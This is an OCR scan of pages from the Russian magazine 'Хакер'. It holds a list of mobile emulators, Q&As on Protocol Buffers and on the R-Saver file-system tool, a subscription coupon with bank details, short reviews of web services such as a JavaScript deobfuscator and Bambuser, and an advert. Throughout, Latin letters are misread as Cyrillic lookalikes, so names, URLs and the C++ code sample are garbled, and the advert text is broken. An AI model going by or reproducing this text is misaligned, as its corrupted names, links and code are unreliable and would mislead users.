• НРѵѵеЬОЗ Етиіаіог — эмулятор немногочис- 
ленныхустройств от НР (Раіпп Рге, Раіт Ріхі, 
Раіт Ріхі Ріиз), поставляется вместе с 5РК: 
беѵеІорег.раІпп.сопп/іпбех.рЬр?іб=1 744 : 

• ІЧокіа ЗутЬіап Етиіаіогз — эмулятор 
устройств, работающих под управлением 
БутЬіап: Ыиу/зутЬіап етиІаІогБ ; 

• ВІаскВеггуЗітиІаІогз — симулятор девайсов 
и ОС ВІаскЬеггѵ: ЫаскЬеггѵ.сот/сІеѵеІорегз/ 
сІоѵѵпІоасІз/зітиІаІогБ : 

• ѴѴіпсІоѵѵз МоЬіІе 6.5 Етиіаіог Ітадез — обра- 
зы эмуляторов ѴѴМ6.5: Ьіиу/ѴѴМббеппиІаІог : 

• ѴѴіпсІоѵѵз РЬопе 7 Зітиіаіог — симулятор 
новой мобильной ОС от МісгозоД, кото- 



Эмулятор Апсігоісі 

рый работаетв связке сѴІБиаІЗіибіо: ЬІІ.Іѵ/ 
ѴУР75ІтиІаІог : 

• Васіа 5іт и Іаіо г — симулятор ОС Ваба от ком- 
пании Затзипд: ЬІТІѵ/Ваба БІтиІаІог . 

О: Все чаще и чаще встречаю довольно 
продвинутые проекты, которые использу- 
ют Соодіе РгоіосоІ Вийеге. Объясни, в чем 
суть проекта? Чем он лучше ХМІ_? 

А: Ргоіосоі ВиДегз (буферы протоколов) — это не 
зависящий отязыка и платформы, расширяе- 
мый способ разделять на серии структурирован- 
ныеданные. Посвоимзадачамтехнология очень 
похожа наХМЦтолько компактнее, быстрее и 
проще. Ты однажды определяешь, какдолжны 
быть структурированы данные, а потом исполь- 
зуешь специально созданный исходный коддля 
записи и чтения структурированных данных в\из 
различных потоков данных, используя разнооб- 
разные языки - баѵа, С++ или Руібоп. Описание 
выполняется в специальных. ргоіо-файлах: 

шеззаде Регзоп { 
гедиігесі зСгіпд паше = 1; 
гедиігесі іпС32 ісЗ. = 2; 
орСіопаІ зСгіпд егпаіі = 3; 

} 

В этом .ргоіо-файле определяется форматопи- 
сания человека. После этого мы можем легко 
использовать это определение для создания и 
манипулирования объектами. 

Регзоп регзоп; 

регзоп . зеС_паше ( "ЦоЦп Бое") ; 
регзоп. зеС_іс1 ( 1234 ) ; 
регзоп. зеС_етаі1 ( 

" б<бое@ехатр1е . сот" ) ; 
ізігеат оиСриС ( 

"туіііе" , іоз::оиС I іоз : : Ьіпагу ) ; 
регзоп . ЗегіаІігеТоОзСгеат (&оиСриЦ ) ; 

Чем этолучшеХМІ_? Использовать Ргоіосоі 



ВиДегз проще, в 1 0-20 раз быстрее и в 3-1 0 раз 
эффективнее в плане полученного объема. 

Есть конкретные примеры использования. 
Например, недавно бэкендТѵѵіиег перешёл на 
Ргоіосоі Виііегз. По заявлению разработчи- 
ков Тѵѵі Не г, база в триллион твитов на ХМ І_ за- 
нимала десять петабайт вместо одного. Боль- 
шое количество примеров и статей потеметы 
найдешь на официальном сайте ( собе.доодіе. 
сот/р/ргоІоЬиІ ). 

Еще интересной разработкой в этой области 
является библиотека МеззадеРаск ( тздраск. 
огд ). которая тоже предназначена для сериали- 
зации данных. Она позволяетобмениваться 
структурированными данными между различ- 
ными языкамитакже, какбЗОЫ, но, вотличие 
от последнего, результат получается меньше и 
быстрее. На сайте доступны модули для РиЬу, 
Регі, РуіЬоп, С/С++, баѵа, РНР, Назкеіі, Еиа. 

О: Существует ли универсальное реше- 
ние для ѴѴіпсІоѵѵз, позволяющее получить 
доступ к данным на разделах с различ- 
ными файловыми системами, которые 
используются в Ыпих- и В50-системах? 
Включая самые современные, вроде 
Ех14. Нет желания держать отдельные 
тулзы, скажем, для Ех12/3/4 и ІІР5/ІІР52. 
А: Мне больше всего по душе утилита Р.Заѵег 
( гІаЬ.ги/іооІБ/гБаѵег.ЫппІ ). Основное назна- 
чение программы — восстановление данных 
с различных версий файловых систем ЕАТ и 
І\ІТЕ5. Но помимо этого утилита предоставляет 
доступ в режиме чтения кследующим файло- 
вым системам: 

• Місгобоіі ѴѴіпбоѵѵз: ЕАТ и ІЧТЕ5, включая 
ЕАТ1 2, ЕАТ1 6, ЕАТ32, ЫТЕ5, ІЧТЕ55; 

• Арріе Мае 05: НЕ5, НЕ5+/НЕ5Х; 

• Еіпих: Ехі2, ЕхіЗ, Ехі4, РеізегЕЗ, 6Е5 и ХЕ5; 

• Ібпіх, В5Р, 5ип Зоіагіз: 0Е5 и 0Е52 (ЕЕ5), 
включая II РВ с обратным порядком байтов, ко- 
торая используется на Зрагс/Роѵѵег серверах. 
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ОДПИСКА 



1. Разборчиво заполни подписной купон и 
квитанцию, вырезав их из журнала, сделав 
ксерокопию или распечатав с сайта зЬор. 

діс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных 
документов — купона и квитанции — 
любым из нижеперечисленных способов: 

• на е-таіі: зиЬзспЬейдІс.ги : 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 1 5280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 
5 эт., офис № 21 , 

ООО «Гейм Лэнд», отдел подписки. 

Внимание! Если произвести оплату в февра- 
ле, то подписку можно оформить с апреля. 

Единая цена по всей России. Доставка 
за счет издателя, в том числе курьером 
Москве в пределах МКАД 






12 НОМЕРОВ - 2200 руб 
6 НОМЕРОВ - 1260 руб. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ ЖУРНАЛ 
НАМНОГО ДЕШЕВЛЕ! 




+ 



ПРИ ПОДПИСКЕ НА КОМПЛЕКТ 
ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 0Ѵ0: - ОДИН 
НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ. НЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 

ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 

ЕСТЬ ВОПРОСЫ? п иши на іпГойдІс.ги или звони по бесплатным 
телефонам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3- 
999 (для жителей других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 2011 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2011 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 





I 









6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




□ІЮ 









6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 

















ОЫиЫЕ 0АТАВА5Е 
5СНЕМА ОЕ5ІОЫЕР 

дЬсІзапг.аррзроІ.сот 

©Еслиты занимаешься разработкой, то наверняка имел делосвизу- 
альными инструментами для проектирования БД. Благодаря им можно 
нетолько наглядно представить структуру будущих та блиц и связи меж- 
ду ними, но и сгенерировать коддля создания базы в СУБД. Ас помощью 
этого сервиса, написанного на РуіЬоп и размещенного в облачном сер- 
висе Ѳоодіе Арр Епдіпе.ты можешь сделать это прямо в браузере. Это 
довольно простое решение, но оно позволяет спроектировать таблицы, 
обозначить первичные и внешние ключи, проверитьсвязи и получить 
готовый коддля РозІдгеЗСЩ ЗОШіе, МуБОЦ МЭЭОБи Огасіе. 



^ѴАБСКІРТ ІІЫРАСКЕР 
АЫО ВЕАШ1РІЕР 

ІзЬеаиііІіег.огд 

О Чтобы уберечь исходники на баѵаБсгірІ от плагиата, а также затруд- 
нитьанализ сценариев антивирусными продуктами и специалистами, 
разработчики часто используютспециальные инструменты-скрамб- 
леры, которые кардинально усложняют чтение кода. В ѴѴѴѴѴѴ2 мы даже 
упоминали толковое онлайн-решение бБсгатЫег, которое как раз вы- 
полняеттакую обфускацию. Сервис ЗБВеаиЫмег, напротив, приводит 
уродливый 65-код в человеческий вид, выполняетформатирование и 
пытается распаковать код, обфусцированный наиболее популярными 
приемами. 




ВАМВІІ5ЕР 

ЬатЬизег.сот 

©Вопрос: как поделиться со всеми желающими потоковым видео с 
камеры своего телефона?Так, чтобы в реальном времени и схорошей 
картинкой/звуком? Идея пришла совершенно неожиданно во время ката- 
ния на сноуборде в горах :). Удивительно, но даже на высоте 3 000 метров 
есть местечки, где быстрый ѴѴі-Рі раздается всем желающим. А разта к, то 
почему не попробовать? Быстро нашелся подходящий сервис ВатЬизег. 
Установив на своем телефоне специальный клиент (поддерживаются де- 
вайсы на ѴѴіпсІоѵѵз МоЬіІе, АпсІгоісІ, І05, ЭутЬіап, Ваба), можно вдва клика 
начать передачу изображения на главный сервер ВатЬизег. А уже оттуда 
все желающие смогутувидеть изображение через свой браузер. 




5ІМКІ. 

зіткі.сот 

©Одной из причин, по которой я когда-то стал использовать ОТаІк в 
качестве основного ІМ-мессенджера, стало централизованное хране- 
ние логов чатов прямо на сервере. Другие сети и клиентские приложе- 
ния этим похвастаться не могли. Теперьэто досадное недоразумение 
во многихслучаях готов исправить сервисБіткІ, сохраняя всю исто- 
рию разговоров на безопасном сервере. Списокклиентов, с которыми 
он совместим, довольно внушителен и включаетв себя 01 Р, Мігапба, 
Рібдіп и другие. С недавнего времени сервис научился записывать 
еще и все голосовые разговоры из Экуре (включая Экуреіп и БкуреОиі), 
нотолько после установки специального клиента на компьютер. 
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ФОКУС-ГРУППА 




Хочешь не только читать журнал, но и вместе с нами делать его лучше? Ука- 
зать на наши фейл ы или выразить респект за сделанную работу? Зто легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки отжур- 
нала и наших партнеров. 



3 самых активныхучастника фокус-группы получат в этом месяце подписки 
на журнал Хакер: за первое место - на 12 месяцев, за второе - на 6 месяцев 
и за третье- на 3 месяца. 



РЕКЛАМА 




ЛАЗЕРНЫЙ ДАТЧИК АѴДВО 

НАСТОТД ОБРАБОТКИ 15000 КАДР О© & СЁКУНДѵ) 



РЫ ѴМИРОвАНИЁ М ДНИ ' ІУЛНЮРД 

С ЛОМОЩЫО НАБОРА ГРУЗОВ 



ЭРГОНОМИЧНАЯ ФОРМА ДПР УДОБНО 1/1 РАБОТЫ 



ДЫМНЫЕ БОКОВЫЕ 7 НАКЛАДКИ 

различного профили 



«Я-Х ПОЗИЦИС! |г ЮС КОЛЕСО ПРОКРУТКИ 
В ВЕРТИКАЛЬНОМ И ГОРИЗОНТАЛЬНОМ НАПРАВЛЕНИЯХ 



ктгрдмичрлкир ипжки ппр: пггкпгп 
□К ОЛЬ ЖЕ НИН 



* п программируемых к? іппок 



7 ПЕРЕКЛЮЧАЕМЫХ ИГРОВЫХ РЕЖИМОВ 
для запуска сие нариё в- СКРИПТОВ. 
СОЗДАННЫХ ПОЛЬЗОВАТЕЛЕМ 



ИГРОВАЯ УТИЛИТА в КОМПЛЕКТЕ 
ОПР ЗАПИСИ МАКРОСОВ 



ПОДКЛЮЧЕНИЕ ЧЕРЕЗ иОВ ПОРТ 



ѵѵхл/ѵѵ.окиск.йУ 



РЕКЛАМА 



